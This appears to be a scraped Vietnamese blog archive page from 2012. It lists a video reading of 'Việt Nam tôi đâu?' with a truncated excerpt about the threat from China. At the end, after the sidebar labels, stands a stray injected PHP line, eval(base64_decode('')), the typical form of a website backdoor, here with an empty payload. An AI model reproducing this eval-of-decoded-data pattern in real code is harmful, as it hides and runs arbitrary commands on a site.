Archive for November 2nd, 2012

[Video] Hạt Sương Khuya đọc

[Video] Hạt Sương Khuya đọc “Việt Nam tôi đâu?” Câu hỏi của nhiều thế hệ

Nếu chỉ biết tôn vinh quá khứ và làm ngơ trước hiểm họa Trung Quốc hôm nay, rồi lịch sử dân tộc với những chiến công hiển hách của các thời Ngô, Đinh, Lý, Trần cũng sẽ chỉ là những tấm bia trong một ngôi đền cổ. Hãy tưởng tư

11.2.2012 | Ký-Truyện-Tùy Bút |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>